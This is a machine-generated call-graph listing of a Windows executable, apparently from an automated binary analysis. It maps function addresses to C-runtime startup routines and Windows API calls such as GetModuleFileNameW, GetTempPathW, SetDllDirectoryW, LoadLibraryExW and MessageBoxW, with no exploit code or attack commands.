__crtLCMapStringW 18802->18803 18803->18789 18805 7ff7262ab830 18816 7ff7262af5e8 EnterCriticalSection 18805->18816 18817 7ff7262a4720 18818 7ff7262a472b 18817->18818 18826 7ff7262ae5b4 18818->18826 18839 7ff7262af5e8 EnterCriticalSection 18826->18839 18464 7ff7262aec9c 18465 7ff7262aee8e 18464->18465 18469 7ff7262aecde _isindst 18464->18469 18466 7ff7262a43f4 _get_daylight 11 API calls 18465->18466 18484 7ff7262aee7e 18466->18484 18467 7ff72629b870 _log10_special 8 API calls 18468 7ff7262aeea9 18467->18468 18469->18465 18470 7ff7262aed5e _isindst 18469->18470 18485 7ff7262b54a4 18470->18485 18475 7ff7262aeeba 18477 7ff7262a9c10 _isindst 17 API calls 18475->18477 18479 7ff7262aeece 18477->18479 18482 7ff7262aedbb 18482->18484 18510 7ff7262b54e8 18482->18510 18484->18467 18486 7ff7262aed7c 18485->18486 18487 7ff7262b54b3 18485->18487 18492 7ff7262b48a8 18486->18492 18517 7ff7262af5e8 EnterCriticalSection 18487->18517 18493 7ff7262b48b1 18492->18493 18494 7ff7262aed91 18492->18494 18495 7ff7262a43f4 _get_daylight 11 API calls 18493->18495 18494->18475 18498 7ff7262b48d8 18494->18498 18496 7ff7262b48b6 18495->18496 18497 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18496->18497 18497->18494 18499 7ff7262b48e1 18498->18499 18500 7ff7262aeda2 18498->18500 18501 7ff7262a43f4 _get_daylight 11 API calls 18499->18501 18500->18475 18504 7ff7262b4908 18500->18504 18502 7ff7262b48e6 18501->18502 18503 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18502->18503 18503->18500 18505 7ff7262b4911 18504->18505 18506 7ff7262aedb3 18504->18506 18507 7ff7262a43f4 _get_daylight 11 API calls 18505->18507 18506->18475 18506->18482 18508 7ff7262b4916 18507->18508 18509 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18508->18509 18509->18506 18518 7ff7262af5e8 EnterCriticalSection 18510->18518 19478 7ff7262ba10e 19479 7ff7262ba127 19478->19479 19480 7ff7262ba11d 19478->19480 19482 7ff7262af648 LeaveCriticalSection 19480->19482 16066 7ff7262a8c79 16078 7ff7262a96e8 16066->16078 16079 7ff7262aa460 __CxxCallCatchBlock 45 API calls 16078->16079 16081 7ff7262a96f1 16079->16081 16080 7ff7262a9814 __CxxCallCatchBlock 45 API calls 16082 7ff7262a9711 16080->16082 16081->16080 18961 7ff7262ba079 18964 7ff7262a4788 LeaveCriticalSection 18961->18964 18971 7ff72629be70 18972 7ff72629be80 18971->18972 18988 7ff7262a8ec0 18972->18988 18974 7ff72629be8c 18994 7ff72629c168 18974->18994 18976 7ff72629c44c 7 API calls 18978 7ff72629bf25 18976->18978 18977 7ff72629bea4 _RTC_Initialize 18986 7ff72629bef9 18977->18986 18999 7ff72629c318 18977->18999 18980 7ff72629beb9 19002 7ff7262a832c 18980->19002 18986->18976 18987 7ff72629bf15 18986->18987 18989 7ff7262a8ed1 18988->18989 18990 7ff7262a8ed9 18989->18990 18991 7ff7262a43f4 _get_daylight 11 API calls 18989->18991 18990->18974 18992 7ff7262a8ee8 18991->18992 18993 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18992->18993 18993->18990 18995 7ff72629c179 18994->18995 18998 7ff72629c17e __scrt_release_startup_lock 18994->18998 18996 7ff72629c44c 7 API calls 18995->18996 18995->18998 18997 7ff72629c1f2 18996->18997 18998->18977 19027 7ff72629c2dc 18999->19027 19001 7ff72629c321 19001->18980 19003 7ff7262a834c 19002->19003 19010 7ff72629bec5 19002->19010 19004 7ff7262a8354 19003->19004 19005 7ff7262a836a GetModuleFileNameW 19003->19005 19006 7ff7262a43f4 _get_daylight 11 API calls 19004->19006 19009 7ff7262a8395 19005->19009 19007 7ff7262a8359 19006->19007 19008 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 19007->19008 19008->19010 19011 7ff7262a82cc 11 API calls 19009->19011 19010->18986 19026 7ff72629c3ec InitializeSListHead 19010->19026 19012 7ff7262a83d5 19011->19012 19013 7ff7262a83dd 19012->19013 19018 7ff7262a83f5 19012->19018 19014 7ff7262a43f4 _get_daylight 11 API calls 19013->19014 19015 7ff7262a83e2 19014->19015 19016 7ff7262a9c58 __free_lconv_mon 11 API calls 19015->19016 19016->19010 19017 7ff7262a8417 19019 7ff7262a9c58 __free_lconv_mon 11 API calls 19017->19019 19018->19017 19020 7ff7262a8443 19018->19020 19021 7ff7262a845c 19018->19021 19019->19010 19022 7ff7262a9c58 __free_lconv_mon 11 API calls 19020->19022 19023 7ff7262a9c58 __free_lconv_mon 11 API calls 19021->19023 19024 7ff7262a844c 19022->19024 19023->19017 19025 7ff7262a9c58 __free_lconv_mon 11 API calls 19024->19025 19025->19010 19028 7ff72629c2f6 19027->19028 19030 7ff72629c2ef 19027->19030 19031 7ff7262a94fc 19028->19031 19030->19001 19034 7ff7262a9138 19031->19034 19041 7ff7262af5e8 EnterCriticalSection 19034->19041 19555 7ff7262b9ef3 19556 7ff7262b9f03 19555->19556 19559 7ff7262a4788 LeaveCriticalSection 19556->19559 19116 7ff7262a9060 19119 7ff7262a8fe4 19116->19119 19126 7ff7262af5e8 EnterCriticalSection 19119->19126 19628 7ff7262aa2e0 19629 7ff7262aa2fa 19628->19629 19630 7ff7262aa2e5 19628->19630 19634 7ff7262aa300 19630->19634 19635 7ff7262aa342 19634->19635 19636 7ff7262aa34a 19634->19636 19637 7ff7262a9c58 __free_lconv_mon 11 API calls 19635->19637 19638 7ff7262a9c58 __free_lconv_mon 11 API calls 19636->19638 19637->19636 19639 7ff7262aa357 19638->19639 19640 7ff7262a9c58 __free_lconv_mon 11 API calls 19639->19640 19641 7ff7262aa364 19640->19641 19642 7ff7262a9c58 __free_lconv_mon 11 API calls 19641->19642 19643 7ff7262aa371 19642->19643 19644 7ff7262a9c58 __free_lconv_mon 11 API calls 19643->19644 19645 7ff7262aa37e 19644->19645 19646 7ff7262a9c58 __free_lconv_mon 11 API calls 19645->19646 19647 7ff7262aa38b 19646->19647 19648 7ff7262a9c58 __free_lconv_mon 11 API calls 19647->19648 19649 7ff7262aa398 19648->19649 19650 7ff7262a9c58 __free_lconv_mon 11 API calls 19649->19650 19651 7ff7262aa3a5 19650->19651 19652 7ff7262a9c58 __free_lconv_mon 11 API calls 19651->19652 19653 7ff7262aa3b5 19652->19653 19654 7ff7262a9c58 __free_lconv_mon 11 API calls 19653->19654 19655 7ff7262aa3c5 19654->19655 19660 7ff7262aa1a4 19655->19660 19674 7ff7262af5e8 EnterCriticalSection 19660->19674 16083 7ff72629bf5c 16104 7ff72629c12c 16083->16104 16086 7ff72629c0a8 16227 7ff72629c44c IsProcessorFeaturePresent 16086->16227 16087 7ff72629bf78 __scrt_acquire_startup_lock 16089 7ff72629c0b2 16087->16089 16096 7ff72629bf96 __scrt_release_startup_lock 16087->16096 16090 7ff72629c44c 7 API calls 16089->16090 16091 7ff72629c0bd __CxxCallCatchBlock 16090->16091 16092 7ff72629bfbb 16093 7ff72629c041 16110 7ff72629c594 16093->16110 16095 7ff72629c046 16113 7ff726291000 16095->16113 16096->16092 16096->16093 16216 7ff7262a8e44 16096->16216 16101 7ff72629c069 16101->16091 16223 7ff72629c2b0 16101->16223 16105 7ff72629c134 16104->16105 16106 7ff72629c140 __scrt_dllmain_crt_thread_attach 16105->16106 16107 7ff72629bf70 16106->16107 16108 7ff72629c14d 16106->16108 16107->16086 16107->16087 16108->16107 16234 7ff72629cba8 16108->16234 16111 7ff7262b97e0 __scrt_get_show_window_mode 16110->16111 16112 7ff72629c5ab GetStartupInfoW 16111->16112 16112->16095 16114 7ff726291009 16113->16114 16261 7ff7262a4794 16114->16261 16116 7ff72629352b 16268 7ff7262933e0 16116->16268 16119 7ff726293538 16121 7ff72629b870 _log10_special 8 API calls 16119->16121 16123 7ff72629372a 16121->16123 16221 7ff72629c5d8 GetModuleHandleW 16123->16221 16124 7ff726293736 16459 7ff726293f70 16124->16459 16125 7ff72629356c 16127 7ff726291bf0 49 API calls 16125->16127 16129 7ff726293588 16127->16129 16330 7ff726297e10 16129->16330 16130 7ff726293785 16132 7ff7262925f0 53 API calls 16130->16132 16132->16119 16134 7ff726293778 16135 7ff72629379f 16134->16135 16136 7ff72629377d 16134->16136 16137 7ff726291bf0 49 API calls 16135->16137 16478 7ff72629f36c 16136->16478 16141 7ff7262937be 16137->16141 16138 7ff72629365f __std_exception_copy 16139 7ff726293834 16138->16139 16142 7ff726297e10 14 API calls 16138->16142 16167 7ff726293805 __std_exception_copy 16139->16167 16482 7ff726293e90 16139->16482 16149 7ff7262918f0 115 API calls 16141->16149 16144 7ff7262936ae 16142->16144 16343 7ff726297f80 16144->16343 16145 7ff726293852 16147 7ff726293871 16145->16147 16148 7ff726293865 16145->16148 16152 7ff726291bf0 49 API calls 16147->16152 16485 7ff726293fe0 16148->16485 16153 7ff7262937df 16149->16153 16150 7ff7262936bd 16154 7ff72629380f 16150->16154 16156 7ff7262936cf 16150->16156 16152->16167 16153->16129 16155 7ff7262937ef 16153->16155 16352 7ff726298400 16154->16352 16160 7ff7262925f0 53 API calls 16155->16160 16348 7ff726291bf0 16156->16348 16159 7ff72629389e SetDllDirectoryW 16166 7ff7262938c3 16159->16166 16160->16119 16169 7ff726293a50 16166->16169 16408 7ff726296560 16166->16408 16403 7ff7262986b0 16167->16403 16168 7ff7262936fc 16448 7ff7262925f0 16168->16448 16172 7ff726293a5a PostMessageW GetMessageW 16169->16172 16173 7ff726293a7d 16169->16173 16172->16173 16543 7ff726293080 16173->16543 16176 7ff7262938ea 16178 7ff726293947 16176->16178 16180 7ff726293901 16176->16180 16488 7ff7262965a0 16176->16488 16178->16169 16186 7ff72629395c 16178->16186 16192 7ff726293905 16180->16192 16509 7ff726296970 16180->16509 16428 7ff7262930e0 16186->16428 16187 7ff726296780 FreeLibrary 16191 7ff726293aa3 16187->16191 16192->16178 16525 7ff726292870 16192->16525 16217 7ff7262a8e5b 16216->16217 16218 7ff7262a8e7c 16216->16218 16217->16093 16219 7ff7262a96e8 45 API calls 16218->16219 16220 7ff7262a8e81 16219->16220 16222 7ff72629c5e9 16221->16222 16222->16101 16225 7ff72629c2c1 16223->16225 16224 7ff72629c080 16224->16092 16225->16224 16226 7ff72629cba8 7 API calls 16225->16226 16226->16224 16228 7ff72629c472 _isindst __scrt_get_show_window_mode 16227->16228 16229 7ff72629c491 RtlCaptureContext RtlLookupFunctionEntry 16228->16229 16230 7ff72629c4f6 __scrt_get_show_window_mode 16229->16230 16231 7ff72629c4ba RtlVirtualUnwind 16229->16231 16232 7ff72629c528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16230->16232 16231->16230 16233 7ff72629c576 _isindst 16232->16233 16233->16089 16235 7ff72629cbb0 16234->16235 16236 7ff72629cbba 16234->16236 16240 7ff72629cf44 16235->16240 16236->16107 16241 7ff72629cf53 16240->16241 16243 7ff72629cbb5 16240->16243 16248 7ff72629d180 16241->16248 16244 7ff72629cfb0 16243->16244 16245 7ff72629cfdb 16244->16245 16246 7ff72629cfdf 16245->16246 16247 7ff72629cfbe DeleteCriticalSection 16245->16247 16246->16236 16247->16245 16252 7ff72629cfe8 16248->16252 16253 7ff72629d0d2 TlsFree 16252->16253 16259 7ff72629d02c __vcrt_InitializeCriticalSectionEx 16252->16259 16254 7ff72629d05a LoadLibraryExW 16256 7ff72629d0f9 16254->16256 16257 7ff72629d07b GetLastError 16254->16257 16255 7ff72629d119 GetProcAddress 16255->16253 16256->16255 16258 7ff72629d110 FreeLibrary 16256->16258 16257->16259 16258->16255 16259->16253 16259->16254 16259->16255 16260 7ff72629d09d LoadLibraryExW 16259->16260 16260->16256 16260->16259 16264 7ff7262ae790 16261->16264 16262 7ff7262ae7e3 16263 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16262->16263 16267 7ff7262ae80c 16263->16267 16264->16262 16265 7ff7262ae836 16264->16265 16556 7ff7262ae668 16265->16556 16267->16116 16564 7ff72629bb70 16268->16564 16271 7ff726293438 16566 7ff7262985a0 FindFirstFileExW 16271->16566 16272 7ff72629341b 16571 7ff7262929e0 16272->16571 16276 7ff7262934a5 16590 7ff726298760 16276->16590 16277 7ff72629344b 16581 7ff726298620 CreateFileW 16277->16581 16279 7ff72629b870 _log10_special 8 API calls 16282 7ff7262934dd 16279->16282 16282->16119 16290 7ff7262918f0 16282->16290 16283 7ff7262934b3 16286 7ff7262926c0 49 API calls 16283->16286 16289 7ff72629342e 16283->16289 16284 7ff72629345c 16584 7ff7262926c0 16284->16584 16286->16289 16288 7ff726293474 __vcrt_InitializeCriticalSectionEx 16288->16276 16289->16279 16291 7ff726293f70 108 API calls 16290->16291 16292 7ff726291925 16291->16292 16293 7ff726291bb6 16292->16293 16295 7ff7262976a0 83 API calls 16292->16295 16294 7ff72629b870 _log10_special 8 API calls 16293->16294 16296 7ff726291bd1 16294->16296 16297 7ff72629196b 16295->16297 16296->16124 16296->16125 16329 7ff72629199c 16297->16329 16954 7ff72629f9f4 16297->16954 16299 7ff72629f36c 74 API calls 16299->16293 16300 7ff726291985 16301 7ff7262919a1 16300->16301 16302 7ff726291989 16300->16302 16958 7ff72629f6bc 16301->16958 16961 7ff726292760 16302->16961 16306 7ff7262919bf 16308 7ff726292760 53 API calls 16306->16308 16307 7ff7262919d7 16309 7ff726291a06 16307->16309 16310 7ff7262919ee 16307->16310 16308->16329 16312 7ff726291bf0 49 API calls 16309->16312 16311 7ff726292760 53 API calls 16310->16311 16311->16329 16313 7ff726291a1d 16312->16313 16314 7ff726291bf0 49 API calls 16313->16314 16315 7ff726291a68 16314->16315 16316 7ff72629f9f4 73 API calls 16315->16316 16317 7ff726291a8c 16316->16317 16318 7ff726291aa1 16317->16318 16319 7ff726291ab9 16317->16319 16320 7ff726292760 53 API calls 16318->16320 16321 7ff72629f6bc _fread_nolock 53 API calls 16319->16321 16320->16329 16322 7ff726291ace 16321->16322 16323 7ff726291ad4 16322->16323 16324 7ff726291aec 16322->16324 16325 7ff726292760 53 API calls 16323->16325 16978 7ff72629f430 16324->16978 16325->16329 16328 7ff7262925f0 53 API calls 16328->16329 16329->16299 16331 7ff726297e1a 16330->16331 16332 7ff7262986b0 2 API calls 16331->16332 16333 7ff726297e39 GetEnvironmentVariableW 16332->16333 16334 7ff726297ea2 16333->16334 16335 7ff726297e56 ExpandEnvironmentStringsW 16333->16335 16337 7ff72629b870 _log10_special 8 API calls 16334->16337 16335->16334 16336 7ff726297e78 16335->16336 16338 7ff726298760 2 API calls 16336->16338 16339 7ff726297eb4 16337->16339 16340 7ff726297e8a 16338->16340 16339->16138 16341 7ff72629b870 _log10_special 8 API calls 16340->16341 16342 7ff726297e9a 16341->16342 16342->16138 16344 7ff7262986b0 2 API calls 16343->16344 16345 7ff726297f94 16344->16345 17187 7ff7262a7548 16345->17187 16347 7ff726297fa6 __std_exception_copy 16347->16150 16349 7ff726291c15 16348->16349 16350 7ff7262a3ca4 49 API calls 16349->16350 16351 7ff726291c38 16350->16351 16351->16167 16351->16168 16353 7ff726298415 16352->16353 17205 7ff726297b50 GetCurrentProcess OpenProcessToken 16353->17205 16356 7ff726297b50 7 API calls 16357 7ff726298441 16356->16357 16358 7ff726298474 16357->16358 16359 7ff72629845a 16357->16359 16361 7ff726292590 48 API calls 16358->16361 16360 7ff726292590 48 API calls 16359->16360 16362 7ff726298472 16360->16362 16363 7ff726298487 LocalFree LocalFree 16361->16363 16362->16363 16364 7ff7262984a3 16363->16364 16366 7ff7262984af 16363->16366 17215 7ff726292940 16364->17215 16367 7ff72629b870 _log10_special 8 API calls 16366->16367 16368 7ff726293814 16367->16368 16369 7ff726297c40 16368->16369 16370 7ff726297c58 16369->16370 16371 7ff726297cda GetTempPathW 16370->16371 16372 7ff726297c7c 16370->16372 16373 7ff726297cef 16371->16373 16374 7ff726297e10 14 API calls 16372->16374 17221 7ff726292530 16373->17221 16375 7ff726297c88 16374->16375 17228 7ff7262977d0 16375->17228 16385 7ff726297d08 __std_exception_copy 16392 7ff726297d45 __std_exception_copy 16385->16392 17225 7ff7262a7e80 16385->17225 16386 7ff72629b870 _log10_special 8 API calls 16388 7ff726297df5 16386->16388 16388->16139 16394 7ff7262986b0 2 API calls 16392->16394 16400 7ff726297db4 __std_exception_copy 16392->16400 16395 7ff726297d91 16394->16395 16396 7ff726297d96 16395->16396 16397 7ff726297dc9 16395->16397 16398 7ff7262986b0 2 API calls 16396->16398 16399 7ff7262a7548 38 API calls 16397->16399 16399->16400 16400->16386 16404 7ff7262986d2 MultiByteToWideChar 16403->16404 16405 7ff7262986f6 16403->16405 16404->16405 16407 7ff72629870c __std_exception_copy 16404->16407 16406 7ff726298713 MultiByteToWideChar 16405->16406 16405->16407 16406->16407 16407->16159 16409 7ff726296575 16408->16409 16410 7ff7262938d5 16409->16410 16411 7ff726292760 53 API calls 16409->16411 16412 7ff726296b00 16410->16412 16411->16410 16413 7ff726296b30 16412->16413 16415 7ff726296b4a __std_exception_copy 16412->16415 16413->16415 17399 7ff726291440 16413->17399 16415->16176 16416 7ff726296b54 16416->16415 16417 7ff726293fe0 49 API calls 16416->16417 16418 7ff726296b76 16417->16418 16419 7ff726296b7b 16418->16419 16420 7ff726293fe0 49 API calls 16418->16420 16421 7ff726292870 53 API calls 16419->16421 16422 7ff726296b9a 16420->16422 16421->16415 16422->16419 16423 7ff726293fe0 49 API calls 16422->16423 16424 7ff726296bb6 16423->16424 16424->16419 16425 7ff726296bbf 16424->16425 16426 7ff7262925f0 53 API calls 16425->16426 16427 7ff726296c2f __std_exception_copy memcpy_s 16425->16427 16426->16415 16427->16176 16439 7ff7262930ee __scrt_get_show_window_mode 16428->16439 16429 7ff72629b870 _log10_special 8 API calls 16431 7ff72629338e 16429->16431 16430 7ff7262932e7 16430->16429 16431->16119 16447 7ff7262983e0 LocalFree 16431->16447 16433 7ff726291bf0 49 API calls 16433->16439 16434 7ff726293309 16436 7ff7262925f0 53 API calls 16434->16436 16436->16430 16438 7ff7262932e9 16442 7ff7262925f0 53 API calls 16438->16442 16439->16430 16439->16433 16439->16434 16439->16438 16441 7ff726292870 53 API calls 16439->16441 16445 7ff7262932f7 16439->16445 17466 7ff726293f10 16439->17466 17472 7ff726297530 16439->17472 17483 7ff7262915c0 16439->17483 17521 7ff7262968e0 16439->17521 17525 7ff726293b40 16439->17525 17569 7ff726293e00 16439->17569 16441->16439 16442->16430 16446 7ff7262925f0 53 API calls 16445->16446 16446->16430 16449 7ff72629262a 16448->16449 16450 7ff7262a3ca4 49 API calls 16449->16450 16451 7ff726292652 16450->16451 16452 7ff7262986b0 2 API calls 16451->16452 16453 7ff72629266a 16452->16453 16454 7ff726292677 MessageBoxW 16453->16454 16455 7ff72629268e MessageBoxA 16453->16455 16456 7ff7262926a0 16454->16456 16455->16456 16457 7ff72629b870 _log10_special 8 API calls 16456->16457 16458 7ff7262926b0 16457->16458 16458->16119 16460 7ff726293f7c 16459->16460 16461 7ff7262986b0 2 API calls 16460->16461 16462 7ff726293fa4 16461->16462 16463 7ff7262986b0 2 API calls 16462->16463 16464 7ff726293fb7 16463->16464 17689 7ff7262a52a4 16464->17689 16467 7ff72629b870 _log10_special 8 API calls 16468 7ff726293746 16467->16468 16468->16130 16469 7ff7262976a0 16468->16469 16470 7ff7262976c4 16469->16470 16471 7ff72629f9f4 73 API calls 16470->16471 16476 7ff72629779b __std_exception_copy 16470->16476 16472 7ff7262976e0 16471->16472 16472->16476 18080 7ff7262a6bd8 16472->18080 16474 7ff72629f9f4 73 API calls 16477 7ff7262976f5 16474->16477 16475 7ff72629f6bc _fread_nolock 53 API calls 16475->16477 16476->16134 16477->16474 16477->16475 16477->16476 16479 7ff72629f39c 16478->16479 18095 7ff72629f148 16479->18095 16481 7ff72629f3b5 16481->16130 16483 7ff726291bf0 49 API calls 16482->16483 16484 7ff726293ead 16483->16484 16484->16145 16486 7ff726291bf0 49 API calls 16485->16486 16487 7ff726294010 16486->16487 16487->16167 16498 7ff7262965bc 16488->16498 16489 7ff72629b870 _log10_special 8 API calls 16491 7ff7262966f1 16489->16491 16490 7ff7262917e0 45 API calls 16490->16498 16491->16180 16492 7ff72629675d 16494 7ff7262925f0 53 API calls 16492->16494 16493 7ff726291bf0 49 API calls 16493->16498 16503 7ff7262966df 16494->16503 16495 7ff72629674a 16496 7ff7262925f0 53 API calls 16495->16496 16496->16503 16497 7ff726293f10 10 API calls 16497->16498 16498->16490 16498->16492 16498->16493 16498->16495 16498->16497 16499 7ff72629670d 16498->16499 16500 7ff726297530 52 API calls 16498->16500 16502 7ff726292870 53 API calls 16498->16502 16498->16503 16504 7ff726296737 16498->16504 16506 7ff7262915c0 118 API calls 16498->16506 16507 7ff726296720 16498->16507 16501 7ff7262925f0 53 API calls 16499->16501 16500->16498 16501->16503 16502->16498 16503->16489 16505 7ff7262925f0 53 API calls 16504->16505 16505->16503 16506->16498 16508 7ff7262925f0 53 API calls 16507->16508 16508->16503 18106 7ff7262981a0 16509->18106 16511 7ff726296989 16512 7ff7262981a0 3 API calls 16511->16512 16513 7ff72629699c 16512->16513 16514 7ff7262969cf 16513->16514 16515 7ff7262969b4 16513->16515 16516 7ff7262925f0 53 API calls 16514->16516 18110 7ff726296ea0 GetProcAddress 16515->18110 16518 7ff726293916 16516->16518 16518->16192 16519 7ff726296cd0 16518->16519 16520 7ff726296ced 16519->16520 16521 7ff7262925f0 53 API calls 16520->16521 16524 7ff726296d58 16520->16524 16522 7ff726296d40 16521->16522 16523 7ff726296780 FreeLibrary 16522->16523 16523->16524 16524->16192 16526 7ff7262928aa 16525->16526 16527 7ff7262a3ca4 49 API calls 16526->16527 16528 7ff7262928d2 16527->16528 16529 7ff7262986b0 2 API calls 16528->16529 16530 7ff7262928ea 16529->16530 16531 7ff7262928f7 MessageBoxW 16530->16531 16532 7ff72629290e MessageBoxA 16530->16532 16533 7ff726292920 16531->16533 16532->16533 16534 7ff72629b870 _log10_special 8 API calls 16533->16534 16535 7ff726292930 16534->16535 16536 7ff726296780 16535->16536 16537 7ff7262968d6 16536->16537 16542 7ff726296792 16536->16542 16537->16178 16538 7ff7262968aa 16540 7ff7262968c2 16538->16540 18174 7ff726298180 FreeLibrary 16538->18174 16540->16178 16542->16538 18173 7ff726298180 FreeLibrary 16542->18173 18175 7ff726295af0 16543->18175 16547 7ff7262930a1 16551 7ff7262930b9 16547->16551 18245 7ff726295800 16547->18245 16549 7ff7262930ad 16549->16551 18254 7ff726295990 16549->18254 16552 7ff7262933a0 16551->16552 16554 7ff7262933ae 16552->16554 16553 7ff7262933bf 16553->16187 16554->16553 18463 7ff726298180 FreeLibrary 16554->18463 16563 7ff7262a477c EnterCriticalSection 16556->16563 16565 7ff7262933ec GetModuleFileNameW 16564->16565 16565->16271 16565->16272 16567 7ff7262985df FindClose 16566->16567 16568 7ff7262985f2 16566->16568 16567->16568 16569 7ff72629b870 _log10_special 8 API calls 16568->16569 16570 7ff726293442 16569->16570 16570->16276 16570->16277 16572 7ff72629bb70 16571->16572 16573 7ff7262929fc GetLastError 16572->16573 16574 7ff726292a29 16573->16574 16595 7ff7262a3ef8 16574->16595 16579 7ff72629b870 _log10_special 8 API calls 16580 7ff726292ae5 16579->16580 16580->16289 16582 7ff726298660 GetFinalPathNameByHandleW CloseHandle 16581->16582 16583 7ff726293458 16581->16583 16582->16583 16583->16284 16583->16288 16585 7ff7262926fa 16584->16585 16586 7ff7262a3ef8 48 API calls 16585->16586 16587 7ff726292722 MessageBoxW 16586->16587 16588 7ff72629b870 _log10_special 8 API calls 16587->16588 16589 7ff72629274c 16588->16589 16589->16289 16591 7ff7262987b5 16590->16591 16592 7ff72629878a WideCharToMultiByte 16590->16592 16593 7ff7262987d2 WideCharToMultiByte 16591->16593 16594 7ff7262987cb __std_exception_copy 16591->16594 16592->16591 16592->16594 16593->16594 16594->16283 16597 7ff7262a3f52 16595->16597 16596 7ff7262a3f77 16598 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16596->16598 16597->16596 16599 7ff7262a3fb3 16597->16599 16601 7ff7262a3fa1 16598->16601 16617 7ff7262a22b0 16599->16617 16602 7ff72629b870 _log10_special 8 API calls 16601->16602 16604 7ff726292a54 FormatMessageW 16602->16604 16603 7ff7262a9c58 __free_lconv_mon 11 API calls 16603->16601 16613 7ff726292590 16604->16613 16606 7ff7262a40ba 16607 7ff7262a40c4 16606->16607 16612 7ff7262a4094 16606->16612 16610 7ff7262a9c58 __free_lconv_mon 11 API calls 16607->16610 16608 7ff7262a9c58 __free_lconv_mon 11 API calls 16608->16601 16609 7ff7262a4060 16611 7ff7262a4069 16609->16611 16609->16612 16610->16601 16611->16608 16612->16603 16614 7ff7262925b5 16613->16614 16615 7ff7262a3ef8 48 API calls 16614->16615 16616 7ff7262925d8 MessageBoxW 16615->16616 16616->16579 16618 7ff7262a22ee 16617->16618 16619 7ff7262a22de 16617->16619 16620 7ff7262a22f7 16618->16620 16625 7ff7262a2325 16618->16625 16621 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16619->16621 16622 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16620->16622 16623 7ff7262a231d 16621->16623 16622->16623 16623->16606 16623->16609 16623->16611 16623->16612 16625->16619 16625->16623 16628 7ff7262a2cc4 16625->16628 16661 7ff7262a2710 16625->16661 16698 7ff7262a1ea0 16625->16698 16629 7ff7262a2d06 16628->16629 16630 7ff7262a2d77 16628->16630 16631 7ff7262a2da1 16629->16631 16632 7ff7262a2d0c 16629->16632 16633 7ff7262a2dd0 16630->16633 16634 7ff7262a2d7c 16630->16634 16721 7ff7262a1074 16631->16721 16635 7ff7262a2d40 16632->16635 16636 7ff7262a2d11 16632->16636 16640 7ff7262a2de7 16633->16640 16642 7ff7262a2dda 16633->16642 16646 7ff7262a2ddf 16633->16646 16637 7ff7262a2db1 16634->16637 16638 7ff7262a2d7e 16634->16638 16643 7ff7262a2d17 16635->16643 16635->16646 16636->16640 16636->16643 16728 7ff7262a0c64 16637->16728 16641 7ff7262a2d20 16638->16641 16650 7ff7262a2d8d 16638->16650 16735 7ff7262a39cc 16640->16735 16659 7ff7262a2e10 16641->16659 16701 7ff7262a3478 16641->16701 16642->16631 16642->16646 16643->16641 16649 7ff7262a2d52 16643->16649 16657 7ff7262a2d3b 16643->16657 16646->16659 16739 7ff7262a1484 16646->16739 16649->16659 16711 7ff7262a37b4 16649->16711 16650->16631 16651 7ff7262a2d92 16650->16651 16651->16659 16717 7ff7262a3878 16651->16717 16653 7ff72629b870 _log10_special 8 API calls 16654 7ff7262a310a 16653->16654 16654->16625 16657->16659 16660 7ff7262a2ffc 16657->16660 16746 7ff7262a3ae0 16657->16746 16659->16653 16660->16659 16752 7ff7262add18 16660->16752 16662 7ff7262a2734 16661->16662 16663 7ff7262a271e 16661->16663 16664 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16662->16664 16667 7ff7262a2774 16662->16667 16665 7ff7262a2d06 16663->16665 16666 7ff7262a2d77 16663->16666 16663->16667 16664->16667 16668 7ff7262a2da1 16665->16668 16669 7ff7262a2d0c 16665->16669 16670 7ff7262a2dd0 16666->16670 16671 7ff7262a2d7c 16666->16671 16667->16625 16676 7ff7262a1074 38 API calls 16668->16676 16672 7ff7262a2d40 16669->16672 16673 7ff7262a2d11 16669->16673 16677 7ff7262a2de7 16670->16677 16679 7ff7262a2dda 16670->16679 16683 7ff7262a2ddf 16670->16683 16674 7ff7262a2db1 16671->16674 16675 7ff7262a2d7e 16671->16675 16680 7ff7262a2d17 16672->16680 16672->16683 16673->16677 16673->16680 16681 7ff7262a0c64 38 API calls 16674->16681 16678 7ff7262a2d20 16675->16678 16686 7ff7262a2d8d 16675->16686 16693 7ff7262a2d3b 16676->16693 16684 7ff7262a39cc 45 API calls 16677->16684 16682 7ff7262a3478 47 API calls 16678->16682 16696 7ff7262a2e10 16678->16696 16679->16668 16679->16683 16680->16678 16687 7ff7262a2d52 16680->16687 16680->16693 16681->16693 16682->16693 16685 7ff7262a1484 38 API calls 16683->16685 16683->16696 16684->16693 16685->16693 16686->16668 16688 7ff7262a2d92 16686->16688 16689 7ff7262a37b4 46 API calls 16687->16689 16687->16696 16691 7ff7262a3878 37 API calls 16688->16691 16688->16696 16689->16693 16690 7ff72629b870 _log10_special 8 API calls 16692 7ff7262a310a 16690->16692 16691->16693 16692->16625 16694 7ff7262a3ae0 45 API calls 16693->16694 16693->16696 16697 7ff7262a2ffc 16693->16697 16694->16697 16695 7ff7262add18 46 API calls 16695->16697 16696->16690 16697->16695 16697->16696 16937 7ff7262a02e8 16698->16937 16702 7ff7262a349e 16701->16702 16764 7ff72629fea0 16702->16764 16707 7ff7262a3ae0 45 API calls 16708 7ff7262a35e3 16707->16708 16709 7ff7262a3ae0 45 API calls 16708->16709 16710 7ff7262a3671 16708->16710 16709->16710 16710->16657 16712 7ff7262a37e9 16711->16712 16713 7ff7262a3807 16712->16713 16714 7ff7262a382e 16712->16714 16715 7ff7262a3ae0 45 API calls 16712->16715 16716 7ff7262add18 46 API calls 16713->16716 16714->16657 16715->16713 16716->16714 16719 7ff7262a3899 16717->16719 16718 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16720 7ff7262a38ca 16718->16720 16719->16718 16719->16720 16720->16657 16722 7ff7262a10a7 16721->16722 16723 7ff7262a10d6 16722->16723 16725 7ff7262a1193 16722->16725 16727 7ff7262a1113 16723->16727 16907 7ff72629ff48 16723->16907 16726 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 16725->16726 16726->16727 16727->16657 16729 7ff7262a0c97 16728->16729 16730 7ff7262a0cc6 16729->16730 